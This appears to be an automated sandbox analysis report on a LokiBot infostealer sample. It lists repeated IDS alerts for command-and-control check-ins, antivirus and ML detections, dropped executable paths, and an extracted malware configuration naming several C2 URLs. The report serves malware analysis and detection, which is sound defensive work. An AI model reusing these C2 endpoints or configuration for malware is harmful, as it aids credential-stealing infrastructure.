                2025-01-07T11:02:51.210960+010028257661Malware Command and Control Activity Detected192.168.2.550009172.245.123.1180TCP
                2025-01-07T11:02:51.916359+010028257661Malware Command and Control Activity Detected192.168.2.550015172.245.123.1180TCP
                2025-01-07T11:02:52.618644+010028257661Malware Command and Control Activity Detected192.168.2.550020172.245.123.1180TCP
                2025-01-07T11:02:53.273172+010028257661Malware Command and Control Activity Detected192.168.2.550026172.245.123.1180TCP
                2025-01-07T11:02:53.936803+010028257661Malware Command and Control Activity Detected192.168.2.550032172.245.123.1180TCP
                2025-01-07T11:02:55.171759+010028257661Malware Command and Control Activity Detected192.168.2.550038172.245.123.1180TCP
                2025-01-07T11:02:55.829665+010028257661Malware Command and Control Activity Detected192.168.2.550044172.245.123.1180TCP
                2025-01-07T11:02:56.557892+010028257661Malware Command and Control Activity Detected192.168.2.550050172.245.123.1180TCP
                2025-01-07T11:02:57.234366+010028257661Malware Command and Control Activity Detected192.168.2.550055172.245.123.1180TCP
                2025-01-07T11:02:57.904891+010028257661Malware Command and Control Activity Detected192.168.2.550061172.245.123.1180TCP
                2025-01-07T11:02:58.574189+010028257661Malware Command and Control Activity Detected192.168.2.550066172.245.123.1180TCP
                2025-01-07T11:02:59.229112+010028257661Malware Command and Control Activity Detected192.168.2.550067172.245.123.1180TCP
                2025-01-07T11:02:59.900572+010028257661Malware Command and Control Activity Detected192.168.2.550068172.245.123.1180TCP
                2025-01-07T11:03:00.558517+010028257661Malware Command and Control Activity Detected192.168.2.550069172.245.123.1180TCP
                2025-01-07T11:03:01.212085+010028257661Malware Command and Control Activity Detected192.168.2.550070172.245.123.1180TCP
                2025-01-07T11:03:01.900649+010028257661Malware Command and Control Activity Detected192.168.2.550071172.245.123.1180TCP
                2025-01-07T11:03:02.675531+010028257661Malware Command and Control Activity Detected192.168.2.550072172.245.123.1180TCP
                2025-01-07T11:03:03.337291+010028257661Malware Command and Control Activity Detected192.168.2.550073172.245.123.1180TCP
                2025-01-07T11:03:04.013533+010028257661Malware Command and Control Activity Detected192.168.2.550074172.245.123.1180TCP
                2025-01-07T11:03:04.679878+010028257661Malware Command and Control Activity Detected192.168.2.550075172.245.123.1180TCP
                2025-01-07T11:03:05.319446+010028257661Malware Command and Control Activity Detected192.168.2.550076172.245.123.1180TCP
                2025-01-07T11:03:05.975970+010028257661Malware Command and Control Activity Detected192.168.2.550077172.245.123.1180TCP
                2025-01-07T11:03:06.639844+010028257661Malware Command and Control Activity Detected192.168.2.550078172.245.123.1180TCP
                2025-01-07T11:03:07.327650+010028257661Malware Command and Control Activity Detected192.168.2.550079172.245.123.1180TCP
                2025-01-07T11:03:08.132275+010028257661Malware Command and Control Activity Detected192.168.2.550080172.245.123.1180TCP
                2025-01-07T11:03:08.806380+010028257661Malware Command and Control Activity Detected192.168.2.550081172.245.123.1180TCP
                2025-01-07T11:03:09.459976+010028257661Malware Command and Control Activity Detected192.168.2.550082172.245.123.1180TCP
                2025-01-07T11:03:10.132210+010028257661Malware Command and Control Activity Detected192.168.2.550083172.245.123.1180TCP
                2025-01-07T11:03:10.788630+010028257661Malware Command and Control Activity Detected192.168.2.550084172.245.123.1180TCP
                2025-01-07T11:03:11.460089+010028257661Malware Command and Control Activity Detected192.168.2.550085172.245.123.1180TCP
                2025-01-07T11:03:12.127099+010028257661Malware Command and Control Activity Detected192.168.2.550086172.245.123.1180TCP
                2025-01-07T11:03:12.756187+010028257661Malware Command and Control Activity Detected192.168.2.550087172.245.123.1180TCP
                2025-01-07T11:03:13.399253+010028257661Malware Command and Control Activity Detected192.168.2.550088172.245.123.1180TCP
                2025-01-07T11:03:14.117177+010028257661Malware Command and Control Activity Detected192.168.2.550089172.245.123.1180TCP
                2025-01-07T11:03:14.771734+010028257661Malware Command and Control Activity Detected192.168.2.550090172.245.123.1180TCP
                2025-01-07T11:03:15.503726+010028257661Malware Command and Control Activity Detected192.168.2.550091172.245.123.1180TCP
                2025-01-07T11:03:16.146706+010028257661Malware Command and Control Activity Detected192.168.2.550092172.245.123.1180TCP
                2025-01-07T11:03:16.829444+010028257661Malware Command and Control Activity Detected192.168.2.550093172.245.123.1180TCP
                2025-01-07T11:03:17.571531+010028257661Malware Command and Control Activity Detected192.168.2.550094172.245.123.1180TCP
                2025-01-07T11:03:18.224687+010028257661Malware Command and Control Activity Detected192.168.2.550095172.245.123.1180TCP
                2025-01-07T11:03:18.881699+010028257661Malware Command and Control Activity Detected192.168.2.550096172.245.123.1180TCP
                2025-01-07T11:03:19.523285+010028257661Malware Command and Control Activity Detected192.168.2.550097172.245.123.1180TCP
                2025-01-07T11:03:20.196458+010028257661Malware Command and Control Activity Detected192.168.2.550098172.245.123.1180TCP
                2025-01-07T11:03:20.851457+010028257661Malware Command and Control Activity Detected192.168.2.550099172.245.123.1180TCP
                2025-01-07T11:03:21.507813+010028257661Malware Command and Control Activity Detected192.168.2.550100172.245.123.1180TCP
                2025-01-07T11:03:22.176021+010028257661Malware Command and Control Activity Detected192.168.2.550101172.245.123.1180TCP
                2025-01-07T11:03:23.213434+010028257661Malware Command and Control Activity Detected192.168.2.550102172.245.123.1180TCP
                2025-01-07T11:03:24.151005+010028257661Malware Command and Control Activity Detected192.168.2.550103172.245.123.1180TCP
                2025-01-07T11:03:24.824519+010028257661Malware Command and Control Activity Detected192.168.2.550104172.245.123.1180TCP
                2025-01-07T11:03:26.710640+010028257661Malware Command and Control Activity Detected192.168.2.550105172.245.123.1180TCP
                2025-01-07T11:03:27.380300+010028257661Malware Command and Control Activity Detected192.168.2.550106172.245.123.1180TCP
                2025-01-07T11:03:28.015736+010028257661Malware Command and Control Activity Detected192.168.2.550107172.245.123.1180TCP
                2025-01-07T11:03:28.703037+010028257661Malware Command and Control Activity Detected192.168.2.550108172.245.123.1180TCP
                2025-01-07T11:03:29.349451+010028257661Malware Command and Control Activity Detected192.168.2.550109172.245.123.1180TCP
                2025-01-07T11:03:30.026092+010028257661Malware Command and Control Activity Detected192.168.2.550110172.245.123.1180TCP
                2025-01-07T11:03:30.701445+010028257661Malware Command and Control Activity Detected192.168.2.550111172.245.123.1180TCP
                2025-01-07T11:03:31.406580+010028257661Malware Command and Control Activity Detected192.168.2.550112172.245.123.1180TCP
                2025-01-07T11:03:32.067627+010028257661Malware Command and Control Activity Detected192.168.2.550113172.245.123.1180TCP
                2025-01-07T11:03:32.733953+010028257661Malware Command and Control Activity Detected192.168.2.550114172.245.123.1180TCP
                2025-01-07T11:03:33.433270+010028257661Malware Command and Control Activity Detected192.168.2.550115172.245.123.1180TCP
                2025-01-07T11:03:34.782674+010028257661Malware Command and Control Activity Detected192.168.2.550116172.245.123.1180TCP
                2025-01-07T11:03:35.422766+010028257661Malware Command and Control Activity Detected192.168.2.550117172.245.123.1180TCP
                2025-01-07T11:03:36.111250+010028257661Malware Command and Control Activity Detected192.168.2.550118172.245.123.1180TCP
                2025-01-07T11:03:36.787347+010028257661Malware Command and Control Activity Detected192.168.2.550119172.245.123.1180TCP
                2025-01-07T11:03:37.443278+010028257661Malware Command and Control Activity Detected192.168.2.550120172.245.123.1180TCP
                2025-01-07T11:03:38.078880+010028257661Malware Command and Control Activity Detected192.168.2.550121172.245.123.1180TCP
                2025-01-07T11:03:38.720674+010028257661Malware Command and Control Activity Detected192.168.2.550122172.245.123.1180TCP
                2025-01-07T11:03:39.392736+010028257661Malware Command and Control Activity Detected192.168.2.550123172.245.123.1180TCP
                2025-01-07T11:03:40.062714+010028257661Malware Command and Control Activity Detected192.168.2.550124172.245.123.1180TCP
                2025-01-07T11:03:40.725262+010028257661Malware Command and Control Activity Detected192.168.2.550125172.245.123.1180TCP
                2025-01-07T11:03:41.427015+010028257661Malware Command and Control Activity Detected192.168.2.550126172.245.123.1180TCP
                2025-01-07T11:03:42.077854+010028257661Malware Command and Control Activity Detected192.168.2.550127172.245.123.1180TCP
                2025-01-07T11:03:42.718228+010028257661Malware Command and Control Activity Detected192.168.2.550128172.245.123.1180TCP
                2025-01-07T11:03:43.373897+010028257661Malware Command and Control Activity Detected192.168.2.550129172.245.123.1180TCP
                2025-01-07T11:03:44.064476+010028257661Malware Command and Control Activity Detected192.168.2.550130172.245.123.1180TCP
                2025-01-07T11:03:44.703993+010028257661Malware Command and Control Activity Detected192.168.2.550131172.245.123.1180TCP
                2025-01-07T11:03:45.361356+010028257661Malware Command and Control Activity Detected192.168.2.550132172.245.123.1180TCP
                2025-01-07T11:03:46.021356+010028257661Malware Command and Control Activity Detected192.168.2.550133172.245.123.1180TCP
                2025-01-07T11:03:46.728055+010028257661Malware Command and Control Activity Detected192.168.2.550134172.245.123.1180TCP
                2025-01-07T11:03:47.390462+010028257661Malware Command and Control Activity Detected192.168.2.550135172.245.123.1180TCP
                2025-01-07T11:03:48.079188+010028257661Malware Command and Control Activity Detected192.168.2.550136172.245.123.1180TCP
                2025-01-07T11:03:48.750749+010028257661Malware Command and Control Activity Detected192.168.2.550137172.245.123.1180TCP
                2025-01-07T11:03:49.450939+010028257661Malware Command and Control Activity Detected192.168.2.550138172.245.123.1180TCP
                2025-01-07T11:03:50.093929+010028257661Malware Command and Control Activity Detected192.168.2.550139172.245.123.1180TCP
                2025-01-07T11:03:50.740699+010028257661Malware Command and Control Activity Detected192.168.2.550140172.245.123.1180TCP
                2025-01-07T11:03:51.391659+010028257661Malware Command and Control Activity Detected192.168.2.550141172.245.123.1180TCP
                2025-01-07T11:03:52.063134+010028257661Malware Command and Control Activity Detected192.168.2.550142172.245.123.1180TCP
                2025-01-07T11:03:52.739569+010028257661Malware Command and Control Activity Detected192.168.2.550143172.245.123.1180TCP
                2025-01-07T11:03:53.390870+010028257661Malware Command and Control Activity Detected192.168.2.550144172.245.123.1180TCP
                2025-01-07T11:03:54.062572+010028257661Malware Command and Control Activity Detected192.168.2.550145172.245.123.1180TCP
                2025-01-07T11:03:54.718933+010028257661Malware Command and Control Activity Detected192.168.2.550146172.245.123.1180TCP
                2025-01-07T11:03:55.375592+010028257661Malware Command and Control Activity Detected192.168.2.550147172.245.123.1180TCP
                2025-01-07T11:03:56.016359+010028257661Malware Command and Control Activity Detected192.168.2.550148172.245.123.1180TCP
                2025-01-07T11:03:56.672622+010028257661Malware Command and Control Activity Detected192.168.2.550149172.245.123.1180TCP
                2025-01-07T11:03:57.344266+010028257661Malware Command and Control Activity Detected192.168.2.550150172.245.123.1180TCP
                2025-01-07T11:03:58.028337+010028257661Malware Command and Control Activity Detected192.168.2.550151172.245.123.1180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://172.245.123.11/tpm/fre.phpAvira URL Cloud: Label: malware
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://172.245.123.11/tpm/fre.php"]}
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeReversingLabs: Detection: 28%
                Source: 9876567899.bat.exeVirustotal: Detection: 29%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JOHP[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Wnuth.exeJoe Sandbox ML: detected
                Source: 9876567899.bat.exeJoe Sandbox ML: detected
                Source: 9876567899.bat.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0074C2A2 FindFirstFileExW,0_2_0074C2A2
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007868EE FindFirstFileW,FindClose,0_2_007868EE
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0078698F
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0077D076
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0077D3A9
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00789642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00789642
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0078979D
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00789B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00789B2B
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0077DBBE
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00785C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00785C97
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0006C2A2 FindFirstFileExW,2_2_0006C2A2
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A68EE FindFirstFileW,FindClose,2_2_000A68EE
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_000A698F
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0009D076
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0009D3A9
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_000A9642
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_000A979D
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_000A9B2B
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0009DBBE
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_000A5C97
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 064DE439h4_2_064DE250
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 064DE439h4_2_064DE260
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 064DE439h4_2_064DE211
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 064DDEC2h4_2_064DDB10
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 064DDEC2h4_2_064DDB20
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 06684559h4_2_066845D3
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 06684559h4_2_066842C8
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4x nop then jmp 06684559h4_2_066842B8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49715 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49734 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49723 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49732 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49736 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49714 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49722 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49742 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49736 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49766 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49766 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49766 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49723 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49741 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49722 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49741 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49734 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49760 -> 172.245.123.11:80
